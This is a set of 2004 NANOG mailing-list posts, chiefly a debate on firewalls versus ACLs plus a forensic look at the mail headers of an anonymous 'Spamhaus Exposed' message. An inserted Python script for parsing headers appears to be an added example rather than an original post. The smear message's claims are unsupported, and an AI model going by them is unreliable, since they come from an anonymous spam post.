As for your cost commentary, you are absolutely right. I said grandma needs a firewall, not that she has one or will buy one. That is the unfortunate disparity between prudence and practical application.

--ra

[1] http://dictionary.reference.com/search?q=firewall

--
k. rachael treu, CISSP [EMAIL PROTECTED]
..quis costodiet ipsos custodes?..

On Wed, Mar 17, 2004 at 11:19:54AM -0800, Alexei Roudnev said something to the effect of:

> Not _firewalling_, but access limitation. Grandma can live with a PNAT router - she does not need any firewall, if she does not grant external access to anything. She can live with the Windows _default deny_ setting. If grandma has extra money, it is better to purchase anti-virus.
>
> Moreover. Just for _grandma_, it can be cheaper to do nothing than to invest in security (bad thing for us, I know!) - because she loses '$0' in case of intrusion... It explains the wide spread of modern viruses, spam-trojans etc. (they cost '$0' to infected households in many cases). It is as with wireless access - my friend has a secured access point, but when I tried, I could use the unsecured access points of 2 of his neighbours. They know about the insecurity - but they do not lose anything, so they do not want to spend $0.01 to improve it. And unfortunately, I can not blame them.
>
> On Wed, Mar 17, 2004 at 08:54:57AM -0800, bill said something to the effect of:
>
> The best option I guess is to figure out how important it is for you to have a firewall,
>
> _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)
>
> Why? When did the end2end nature of the Internet suddenly sprout these mutant bits of extra complexity that reduce the overall security of the 'net? Two questions asked, Two answers are sufficient.
>
> Nope. One will do it. The day the first remote exploit or condition, in protocol or application, that could potentially have given rise to such an exploit made it possible for a user not in your control to gain control of your box(en), firewalling became necessary.
>
> Then the Internet is not exactly end-to-end beyond pure fundamentals; it's more end-to-many-ends. And the notion of end-to-end requires preservation of a connection between 2 consenting hosts, and preservation includes securement of that connection against destructive mechanisms, which includes the subversive techniques and interceptions commonly associated with network security. Denial of Service is as much a threat to availability and network functionality as is a power outage, if it occurs.
>
> Before this turns to a "you security freaks want to screw around with my network and don't care about availability"...
>
> Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. Am I correct in understanding that you feel edge filtering is mutant lunacy and unnecessary complexity?
>
> Regarding dedicated firewalls, please see Mr. Bellovin's previous post regarding appropriate and competent administration. The lack thereof presents the complication, not the countermeasure itself.
>
> As for your assertion that firewalls reduce the overall security of the 'net, can you please elaborate on that, as well? Other factions might/do argue that it's the other team refusing to lock their doors at night that are perpetuating the flux of bad behavior, as a close second to the ignorant and infected.
>
> --ra
>
> --
> k. rachael treu, CISSP [EMAIL PROTECTED]
> ..quis costodiet ipsos custodes?..
>
> --bill
Re: Firewall opinions wanted please
Firewall refers to access control. Firewall appliances are dedicated machines that perform firewall functions. ACLs on many router platforms are called firewalls. Juniper calls them firewall filters.

My personal context was covered in a reply I sent earlier in this thread that read:

    Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls.

So...I don't disagree with you at all...

--ra

On Wed, Mar 17, 2004 at 06:33:54PM -, Matt Ryan said something to the effect of:

> Depending on your chosen vendor the ACL cost is unlikely to be $0 - if you steal CPU cycles from packet forwarding then you incur earlier router upgrade costs and that has an NPV cost increase associated with it. It's just not as obvious as an invoice for a firewall.
>
> Matt.
>
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Eric Gauthier
> Sent: 17 March 2004 17:20
> To: [EMAIL PROTECTED]
> Subject: Re: Firewall opinions wanted please
>
> > _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)
>
> By firewall, do you mean a dedicated unit that does stateful filtering or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs... I'm sure that the cost of the ACLs (i.e. $0.00) versus the cost of a firewall also helped them in their decision...
>
> Eric :)
>
> --
> Live Life in Broadband
> www.telewest.co.uk

==
--
rachael treu [EMAIL PROTECTED]
..quis costodiet ipsos custodes?..
Re: Firewall opinions wanted please
On Wed, 2004-03-17 at 21:02, Petri Helenius wrote:
> No, the applications should accept only authorized connections. If that would be the case, there would be no need to filter at packet level.

No, since this would be assuming that each application is perfect and there's no such thing as buffer overflows and other software bugs (including those in authentication routines). A firewall is an extra line of defence in preventing malicious packets from reaching the destination app, and the more people have one the better (although I'm not sure whether grandma would be too bothered). It's not bulletproof (and could potentially contain a bug itself) but it provides additional security, regardless of authentication of connections.

--
---
Erik Haagsman
Network Architect
We Dare BV
tel: +31.10.7507008
fax: +31.10.7507005
http://www.we-dare.nl
Re: NetAdmin + sales on NANOG like places.
** Reply to message from Gerald [EMAIL PROTECTED] on Wed, 17 Mar 2004 14:22:25 -0500 (EST)

> On Wed, 17 Mar 2004, Jonathan M. Slivko wrote:
> > SNIP INTRO SALES BLURB
> > I look forward to talking to you soon.
> > Jonathan M. Slivko [EMAIL PROTECTED] Sales/Network Operations Invisible Hand Networks, Inc.
>
> I am currently doing a little of both sales/network admin at my company, which competes directly with Jonathan's in the NYC market. I have some ?s about (network admins + sales people) for nanog folk:
>
> - As much as I sympathize with JS's desire to get his company name and information out, is this kind of E-mail encouraged/discouraged on NANOG? (AUP: "Blatant product marketing is unacceptable." Does this fit?)
>
> Would NANOG as a group agree (I know...you can laugh now.) that requests made here for suggestions are more often looking for technical people that have purchased from a company than a slightly biased sales pitch from the company you work for? I'm not an anti-capitalist, but I do like to attempt to keep the SNR down, and if companies force sales hats on the networking staff this will become much more prevalent.
>
> Jonathan, this isn't intended to offend you either, so I hope you don't take it that way.

Not that I'm any sort of PTB here (or pretty much anywhere), but I would prefer that sales pitches of the type referenced be taken off list. So if we're polling trolling, that's my opinion.

--
Jeff Shultz
Loose nut behind the wheel.
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 12:19:53PM -0500, Eric Gauthier said something to the effect of:

> > _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;)
>
> By firewall, do you mean a dedicated unit that does stateful filtering

No.

> or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs...

fire'wall
1. A fireproof wall used as a barrier to prevent the spread of fire.
2. Computer Science. Any of a number of security schemes that prevent unauthorized users from gaining access to a computer network or that monitor transfers of information to and from the network.

> I'm sure that the cost of the ACLs (i.e. $0.00) versus the cost of a firewall also helped them in their decision...

This is just a semantic issue. I am putting any packet-level inspection engine deployed as an access control means into the category of firewall. The confusion here would be akin to my retorting with "how on earth are deploying lists of system object access rights going to protect a network edge?" ;) ACL has alternate meanings, as well[1].

A sample of what some vendors call some things:

    Cisco:     router packet-level access control = ACL
    Microsoft: OS object permissioning schema     = ACL
    Linksys:   router packet-level access control = firewall
    Juniper:   router packet-level access control = firewall filter

:)

*,
--ra

[1] http://whatis.techtarget.com/definition/0,289893,sid9_gci213757,00.html

--
k. rachael treu, CISSP [EMAIL PROTECTED]
..quis costodiet ipsos custodes?..

> Eric :)
Re: Firewall opinions wanted please
In message [EMAIL PROTECTED], Petri Helenius writes:
> No, the applications should accept only authorized connections. If that would be the case, there would be no need to filter at packet level.

No. Quite apart from the fact that you mean authorized, not authenticated, the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem. Put in a NANOG-friendly way, they're a scalable security mechanism that can *help* defend you. Think of the endorsement on most tubes of (American) toothpaste:

    ... has been shown to be an effective decay-preventive dentifrice that can be of significant value when used as directed in a conscientiously applied program of oral hygiene and regular professional care.

If all you want to do is say "no" to all incoming connections on a single machine, you don't need a separate box labeled "firewall" -- assuming, of course, that your host is properly configured. Most systems aren't configured that way; worse yet, it takes a lot of knowledge to understand how to block things, and when it's ok to do so. (It's an amusing exercise to run ZoneAlarm on a new, out-of-the-box Windows machine and see how many different programs think they need to talk to the network, or (worse yet) act as servers.)

But it's a lot of work to configure a machine to be that safe, and if you have a hundred or a thousand of them you can't do it; entropy will open up new holes -- that is, open up new sockets for buggy applications -- faster than you can close them down. Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful.

Perfect? No, of course not. A good idea? Absolutely.

--Steve Bellovin, http://www.research.att.com/~smb
Re: Firewall opinions wanted please
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Erik Haagsman wrote:
| On Wed, 2004-03-17 at 21:02, Petri Helenius wrote:
|
| > No, the applications should accept only authorized connections. If that
| > would be the case, there would be no need to filter at packet level.
|
| No, since this would be assuming that each application is perfect and
| there's no such thing as buffer overflows and other software bugs
| (including those in authentication routines). A firewall is an extra
| line of defence in preventing malicious packets from reaching the
| destination app and the more people have one the better (although I'm
| not sure whether grandma would be too bothered)
| It's not bulletproof (and could potentially contain a bug itself) but it
| provides additional security, regardless of authentication of
| connections.

And I think you have hit it right on the head...another line of defense. Everything I've ever read about security (network or otherwise) suggests that a layered approach increases effectiveness. I certainly don't trust a firewall appliance as my only security device, so I also do prudent things like disable ports and applications that are not in use on my network and enforce authentication and authorization for access to legitimate services.

- --
=
bep

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (MingW32)

iD8DBQFAWLiWE1XcgMgrtyYRAjh+AJ9Cio8w/iPuT+EfUK26ku2RdDl9JwCgrN9P
Qll6/VX0Z4xVBRf+G0S5HXA=
=uFwS
-END PGP SIGNATURE-
Re: Update on Querying IADB
> 127.3.100.3  Accepts unverified sign-ups, gives chance to opt out
> 127.3.100.5  Has opt-in confirmation mechanism
> 127.3.100.6  Has and uses opt-in confirmation mechanism
> 127.3.100.10 All mailing list mail is confirmed opt-in
>
> Hmm.. this is loads of fun if you're running a Listserv that has several thousand lists defined, and not all of them have the same policies (for instance, although the vast majority of our lists are 'confirmed opt-in', we have several lists that are bulk-loaded with database extracts for captive audience lists such as all freshmen, all grad students, and so on).

In a case like this we would list separately any IPs from which *only* confirmed lists come, so that they would get the 127.3.100.10 listing. Otherwise we would look at the lowest common denominator and use that data code response.

> Also, the pricing seems a bit whacked - are you *really* expecting sites that have less than 30 customers to pay $200/month? I know a *lot* of people who have formed collectives of 10-15 people who chip in and get a 1U at a colo

I've already answered this on the fly, separately, but it bears repeating. If you are talking about non-commercial mailing lists, that would probably qualify for the newsletter publisher rate, which is only $10/month. It's also critical that people understand that you are now talking about *being listed* in IADB, not about querying IADB, which is always free (we've heard from at least one list member who thought these rates being talked about were to *query* the list).

> It's totally unclear how you can encode an individual listing - that whole stuff to the left of the @ sign thing is rather unhandy...

Are you asking "is there a data response code for individual?" There *could* be, but we determined that in the scheme of things which most receiving systems care about, it doesn't matter. What matters is the type of mail they send.

Anne
net-co-op (was Re: who offers cheap (personal) 1U colo?)
Based on the response I've gotten off-list from people interested in sharing our resources know-how with each other, I've just registered net-co-op.org. In the next couple of days I'll set up a mailing list and a basic web page. Once the mailing list is set up, I'll post another message to NANOG. On the net-co-op mailing list we can hash out a basic charter agreement and get to know each other. More to come... Janet
Re: Firewall opinions wanted please
On Wed, 2004-03-17 at 21:44, Bruce Pinsky wrote:
> Everything I've ever read about security (network or otherwise) suggests that a layered approach increases effectiveness. I certainly don't trust a firewall appliance as my only security device, so I also do prudent things like disable ports and applications that are not in use on my network and enforce authentication and authorization for access to legitimate services.

Good point...and that's exactly why in some cases, especially in SOHO and SMB oriented products, both hardware as well as software vendors can be part of the security problem by advertising their products as the definite solution to all security holes. Truly securing even a single server or host connected to the Internet entails a lot more than just blocking a few ports, let alone securing a network. By marketing "the perfect solution" to not-too-clueful admins the actual security holes only get bigger and harder to track.

--
---
Erik Haagsman
Network Architect
We Dare BV
tel: +31.10.7507008
fax: +31.10.7507005
http://www.we-dare.nl
Spamhaus Exposed
Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
On Wed, Mar 17, 2004 at 02:01:43PM -0700, Janet Sullivan wrote: Based on the response I've gotten off-list from people interested in sharing our resources know-how with each other, I've just registered net-co-op.org. ... Oh come on, what was .coop for if not this? :) -- Daniel Medina
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 09:48:30AM -0800, Kevin Oberman said something to the effect of:

..snip snip..

> I dislike firewalls for many applications, although I have a Sonic Wall on my cable modem. On the whole, they lead to false belief that firewalls really make you safe. They also block many interesting applications. Things like H.323 conferencing are made vastly more complex by firewalls with no easy or canned work-arounds.

H.323 is its own complex, unwieldy mutant (though a lovely one at that), and it is unfair to throw the baby out with the bathwater in that case. Something like saying that it's rough to configure MPLS on your cable modem at home so we should do away with those. Configured properly, firewalls handle H.323 just fine.

As for false beliefs...

Seat belts aren't guaranteed to save your life if you wrap your car around a tree, but they improve the chances that you won't pierce the windshield with your face.

That lid on your coffee cup has a hole in it so you can drink out of it, but that can spill, too.. Still...which way would you rather have that cup--lidded or lidless--when it goes flying out of your cupholder and into your lap?

A stoplight doesn't actually physically stop traffic. Having a green light in your direction doesn't actually guarantee that the intersecting traffic won't plow into you.

Sometimes parachutes don't open properly, but can you imagine if people gave up skydiving altogether, or skydived without them, refusing to be lulled into a false sense of safety?

Hrm. This now becomes an issue of adequate education and precaution. It's not the fault of the technology if its users are ill-informed...

> One large research site I work closely with has directly opted for IDS with a bad attitude (love that description) which has successfully blocked many intrusion and DOS attempts with no major failures. Slammer did overwhelm it, but it did the same for most everything.

IDS that reacts is, by classical definition, firewalling. The IDS component merely detects the anomaly. To react is a firewall function. Does IDS not smack of that false sense of security you mentioned? If admins refuse to acknowledge attack conditions because the IDS didn't squawk, does that guarantee that the network is totally peaceful?

> The end-to-end nature of the net is really, really important, but is being blocked more and more by those who think the net is web browsing and e-mail clients and that everything else is simply an annoyance. This attitude is hamstringing network development already and may end up turning the commercial Internet into a permanently limited tool with fewer real capabilities than the ARPANET had before TCP/IP replaced NCP.

This is a very valid concern. Unfortunately, aside from those in pure academia, this is the bread and butter for most of us. The HTML-for-the-masses and email-happy vox populi are the ones subscribing to providers and buying bandwidth that we are trying to enable.

> Grandma may need a firewall. (My sister DEFINITELY needs one.) But not all network connections need or will benefit from a firewall. And many systems will exist with significant security flaws because the owners believe that the firewall takes care of everything.

As do many owners that believe their Microsoft boxes do everything. Or nothing. Or that nothing needs to be done to their MS boxes...

*,
--ra

--
k. rachael treu, CISSP [EMAIL PROTECTED]
..quis costodiet ipsos custodes?..

> --
> R. Kevin Oberman, Network Engineer
> Energy Sciences Network (ESnet)
> Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
> E-mail: [EMAIL PROTECTED] Phone: +1 510 486-8634
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
Janet,

Since your note earlier today there have been just under 200 fetches of the html. I've written to Byron Henderson and asked him to help me with the coop formation. He and I worked on the .coop sTLD proposal, and as I mentioned, I discussed a member-owned colo coop with Carolyn Hoover of the NCBA this week, as well as the similar idea for bloggers as a vhost user class in Rome last week.

There are not a lot of cooperatives out there ... Mt. Xinu was employee owned. Poptel was an employee-owned coop in the ISP and hosting markets, including the .coop registry implementor and operator, but recently was forced to convert to structured venture-equity ownership. There is some bandwidth purchaser's cooperative in the South West ...

Cheers,
Eric
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
On Wed, 17 Mar 2004, Daniel Medina wrote: On Wed, Mar 17, 2004 at 02:01:43PM -0700, Janet Sullivan wrote: Based on the response I've gotten off-list from people interested in sharing our resources know-how with each other, I've just registered net-co-op.org. ... Oh come on, what was .coop for if not this? :) People in the poultry business? :-) -- Jay Hennigan - CCIE #7880 - Network Administration - [EMAIL PROTECTED] WestNet: Connecting you to the planet. 805 884-6323 WB6RDV NetLojix Communications, Inc. - http://www.netlojix.com/
Strange message possibly through nanog mail server
I just received this. I would like to check if others have received it and whether it did indeed come through the nanog mailing list:

> Date: Wed, 17 Mar 2004 21:10:38 +
> From: Deep Throat [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> Subject: Spamhaus Exposed
>
> Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/
> ___

And while the website was unavailable and the sender is being anonymous (which is against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something goes through this mail list, which makes me think it might have come through the merit mail machine but not actually through the mail list).

What I find even more disturbing is that the ip address listed as origin (which may well have been forged if they managed to gain some higher level access to merit servers) is that of the US Military. Below is the header for your review. I do however find it slightly more likely that it's some kind of sophisticated joe-job on spamhaus and that the info is forged, but they may have used some bug in the merit mail software.

Return-Path: [EMAIL PROTECTED]
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
    by sokol.elan.net (8.12.5/8.12.5) with ESMTP id i2HMKZdw015368
    for [EMAIL PROTECTED]; Wed, 17 Mar 2004 14:20:35 -0800
Received: by trapdoor.merit.edu (Postfix) id CF8FA91307;
    Wed, 17 Mar 2004 16:11:00 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 92B3591328;
    Wed, 17 Mar 2004 16:11:00 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
    by trapdoor.merit.edu (Postfix) with ESMTP id BCC5691307
    for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: by segue.merit.edu (Postfix) id A27775DE7B;
    Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from hotmail.com (bay13-f78.bay13.hotmail.com [64.4.31.78])
    by segue.merit.edu (Postfix) with ESMTP id 5C2B05DE72
    for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
    Wed, 17 Mar 2004 13:10:38 -0800
Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP;
    Wed, 17 Mar 2004 21:10:38 GMT
X-Originating-IP: [198.26.130.36]          <-- Note this, see below
X-Originating-Email: [EMAIL PROTECTED]
X-Sender: [EMAIL PROTECTED]
From: Deep Throat [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Spamhaus Exposed
Date: Wed, 17 Mar 2004 21:10:38 +
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: [EMAIL PROTECTED]
X-OriginalArrivalTime: 17 Mar 2004 21:10:38.0810 (UTC) FILETIME=[4C3633A0:01C40C64]
Sender: [EMAIL PROTECTED]
Precedence: bulk
Errors-To: [EMAIL PROTECTED]
X-Loop: nanog

Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/

--

$ host 198.26.130.36
36.130.26.198.in-addr.arpa domain name pointer BU-WCS1-SAND.NIPR.MIL.

[whois.completewhois.com]
Elan Completewhois.Com Whois Server, Version 0.91a6, compiled on Jan 02, 2004
Please see http://www.completewhois.com/help.htm for command-line options
Use of this server and any information obtained here is allowed only if you follow our policies at http://www.completewhois.com/policies.htm

[IPv4 whois information on 198.26.130.36 ]
[Query Origin: Main Whois Query ]
[whois.arin.net]
OrgName:    The Defense Information Systems Agency
OrgID:      DISA
Address:    DISA/DSSO/JCLCC
Address:    Room BF655A, The Pentagon
City:       Washington
StateProv:  DC
PostalCode: 20301
Country:    US

NetRange:   198.25.0.0 - 198.26.255.255
CIDR:       198.25.0.0/16, 198.26.0.0/16
NetName:    NETBLK-DISA-C
NetHandle:  NET-198-25-0-0-1
Parent:     NET-198-0-0-0-0
NetType:    Direct Allocation
NameServer: AAA-KELLY.NIPR.MIL
NameServer: AAA-VAIHINGEN.NIPR.MIL
NameServer: AAA-WHEELER.NIPR.MIL
NameServer: AAA-VIENNA.NIPR.MIL
Comment:
RegDate:    1992-12-05
Updated:    2004-01-13
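The walk through the Received: chain that the post does by hand, as an added example (not code from the post or from the list software): it reads the hops oldest-first, checks for the list markers, and separates the last IP the list's own relays recorded from the origin the webmail front end merely asserted in X-Originating-IP. The sample header is constructed from the hops quoted above with the redacted mailboxes replaced by example.net placeholders, and the trusted-relay suffixes are an assumption.

```python
"""Trace a list message through its Received: headers.

Added example for the header walk above, not code from the post or from
the list software.  The sample is constructed from the hops quoted on the
page; the example.net mailboxes stand in for the redacted ones.
"""
import re
from email import message_from_string

# Constructed sample (placeholder mailboxes are an assumption).
SAMPLE_HEADERS = """\
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
\tby sokol.elan.net (8.12.5/8.12.5) with ESMTP id i2HMKZdw015368
\tfor <poster@example.net>; Wed, 17 Mar 2004 14:20:35 -0800
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 92B3591328;
\tWed, 17 Mar 2004 16:11:00 -0500 (EST)
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
\tby trapdoor.merit.edu (Postfix) with ESMTP id BCC5691307
\tfor <nanog@example.net>; Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: from hotmail.com (bay13-f78.bay13.hotmail.com [64.4.31.78])
\tby segue.merit.edu (Postfix) with ESMTP id 5C2B05DE72
\tfor <nanog@example.net>; Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
\tWed, 17 Mar 2004 13:10:38 -0800
Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP;
\tWed, 17 Mar 2004 21:10:38 GMT
X-Originating-IP: [198.26.130.36]
Subject: Spamhaus Exposed
Precedence: bulk
X-Loop: nanog

(body omitted)
"""

# "from <sender> by <relay> ..."; the from-clause is absent on local handoffs.
RECEIVED_RE = re.compile(r"^(?:from\s+(?P<from>.+?)\s+)?by\s+(?P<by>\S+)", re.I)
IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
BRACKET_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def _ip_of(from_clause):
    """IP the receiving relay recorded for the sender, if any."""
    if not from_clause:
        return None
    m = BRACKET_IP_RE.search(from_clause)   # "name (helo [a.b.c.d])" form
    if m:
        return m.group(1)
    head = from_clause.split()[0]           # bare "from a.b.c.d" form
    return head if IP_RE.fullmatch(head) else None

def parse_received(msg):
    """Hops oldest-first as dicts (from, by, ip).  Each relay prepends its
    own Received: line, so the last header is the first hop."""
    hops = []
    for raw in msg.get_all("Received", []):
        text = " ".join(raw.split())        # unfold continuation lines
        m = RECEIVED_RE.match(text)
        if not m:
            continue
        sender = m.group("from")
        hops.append({"from": sender.split()[0] if sender else None,
                     "by": m.group("by").rstrip(";,"),
                     "ip": _ip_of(sender)})
    hops.reverse()
    return hops

def via_list(msg, hops, list_domain="merit.edu", list_tag="nanog"):
    """Did the message pass the list's relays and carry its markers?"""
    relayed = any(h["by"].endswith(list_domain) for h in hops)
    marked = msg.get("X-Loop") == list_tag and msg.get("Precedence") == "bulk"
    return relayed and marked

def trust_boundary_ip(hops, trusted_suffixes):
    """Walk newest-to-oldest through relays we trust and return the IP the
    first outside system handed to them.  Anything earlier, including a
    webmail front end's X-Originating-IP, is that system's claim, not ours."""
    for h in reversed(hops):
        if not h["by"].endswith(trusted_suffixes):
            return None                     # beyond our relays: nothing to vouch for
        if h["from"] is None or h["from"].endswith(trusted_suffixes):
            continue                        # internal handoff between our hosts
        return h["ip"]
    return None

def analyze(raw, trusted=("merit.edu", "elan.net")):
    """Summarize one raw message: hops, list markers, claimed vs. vouched IP."""
    msg = message_from_string(raw)
    hops = parse_received(msg)
    return {
        "hops": hops,
        "via_list": via_list(msg, hops),
        "claimed_origin": (msg.get("X-Originating-IP") or "").strip("[]") or None,
        "earliest_recorded_ip": next((h["ip"] for h in hops if h["ip"]), None),
        "boundary_ip": trust_boundary_ip(hops, trusted),
    }

if __name__ == "__main__":
    r = analyze(SAMPLE_HEADERS)
    for i, h in enumerate(r["hops"], 1):
        print(f"{i}: {h['from'] or '(local)'} -> {h['by']}  ip={h['ip']}")
    print("via list:", r["via_list"], " claimed origin:", r["claimed_origin"])
    print("last IP our relays can vouch for:", r["boundary_ip"])
```

On the sample, the only IP the list's relays can vouch for is the hotmail outbound host; the 198.26.130.36 value exists solely in hotmail's own hop and header, which is the point the post makes about possible forgery.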
RE: Strange message possibly through nanog mail server
Got it, came from nanog, originated from DISA (purportedly, anyways):

Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP; Wed, 17 Mar 2004 21:10:38 GMT

#whois 198.26.130.36
OrgName: The Defense Information Systems Agency
OrgID: DISA
Address: DISA/DSSO/JCLCC
Address: Room BF655A, The Pentagon
City: Washington
StateProv: DC
PostalCode: 20301
Country: US
NetRange: 198.25.0.0 - 198.26.255.255
CIDR: 198.25.0.0/16, 198.26.0.0/16
NetName: NETBLK-DISA-C
NetHandle: NET-198-25-0-0-1
Parent: NET-198-0-0-0-0
NetType: Direct Allocation
NameServer: AAA-KELLY.NIPR.MIL
NameServer: AAA-VAIHINGEN.NIPR.MIL
NameServer: AAA-WHEELER.NIPR.MIL
NameServer: AAA-VIENNA.NIPR.MIL

I *think* I loaded the page in lynx before it got rate-limited, and lynx flashed through a whole mess of fast redirects before faulting out. No logs, unfortunately.

Just a question: is this the chinese year of the immature script kiddie or something?

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of william(at)elan.net
Sent: Wednesday, March 17, 2004 5:58 PM
To: [EMAIL PROTECTED]
Subject: Strange message possibly through nanog mail server

I just received this. I would like to check if others have received it and did it indeed come through nanog mailist:

Date: Wed, 17 Mar 2004 21:10:38 +
From: Deep Throat [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Spamhaus Exposed

Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/
___

And while the website was unavailable and the sender is being anonymous (which is against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something goes through this mail list, which makes me think it might have come through merit mail machine but not actually through mail list).

What I find even more disturbing is that ip address listed as origin (which may well have been forged if they managed to gain some higher level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that it's some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software.

Return-Path: [EMAIL PROTECTED]
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by sokol.elan.net (8.12.5/8.12.5) with ESMTP id i2HMKZdw015368 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 14:20:35 -0800
Received: by trapdoor.merit.edu (Postfix) id CF8FA91307; Wed, 17 Mar 2004 16:11:00 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 92B3591328; Wed, 17 Mar 2004 16:11:00 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id BCC5691307 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: by segue.merit.edu (Postfix) id A27775DE7B; Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from hotmail.com (bay13-f78.bay13.hotmail.com [64.4.31.78]) by segue.merit.edu (Postfix) with ESMTP id 5C2B05DE72 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 17 Mar 2004 13:10:38 -0800
Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP; Wed, 17 Mar 2004 21:10:38 GMT
X-Originating-IP: [198.26.130.36]   Note this, see below
X-Originating-Email: [EMAIL PROTECTED]
X-Sender: [EMAIL PROTECTED]
From: Deep Throat [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Spamhaus Exposed
Date: Wed, 17 Mar 2004 21:10:38 +
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: [EMAIL PROTECTED]
X-OriginalArrivalTime: 17 Mar 2004 21:10:38.0810 (UTC) FILETIME=[4C3633A0:01C40C64]
Sender: [EMAIL PROTECTED]
Precedence: bulk
Errors-To: [EMAIL PROTECTED]
X-Loop: nanog

Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/

--
$ host 198.26.130.36
36.130.26.198.in-addr.arpa domain name pointer BU-WCS1-SAND.NIPR.MIL.

[whois.completewhois.com]
Elan Completewhois.Com Whois Server, Version 0.91a6, compiled on Jan 02, 2004
Please see http://www.completewhois.com/help.htm for command-line options
Use of this server and any information obtained here is allowed only if you follow our policies at http://www.completewhois.com/policies.htm
[IPv4 whois information on 198.26.130.36 ]
[Query Origin: Main Whois Query ]
[whois.arin.net]
OrgName: The Defense
Re: Strange message possibly through nanog mail server
On 17.03.2004 23:57 william(at)elan.net wrote:

And while the website was unavailable and the sender is being anonymous (which is against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something goes through this mail list, which makes me think it might have come through merit mail machine but not actually through mail list).

The envelope-to decides where a mail goes to. All of your body header fields are actually meaningless. What I can say is it came thru NANOG.

Mozilla junk tool perfectly classified this email as SPAM :-)

Arnold
RE: Strange message possibly through nanog mail server
From: william(at)elan.net [mailto:[EMAIL PROTECTED]

I just received this. I would like to check if others have received it and did it indeed come through nanog mailist

It came through NANOG, delivered from a Hotmail account that accepted it from 198.26.130.36. Yes, that is a military IP, and most definitely not the first time that spammers have relayed emails through compromised military machines. Spammers broke federal law long before the YOU-CAN-SPAM act.

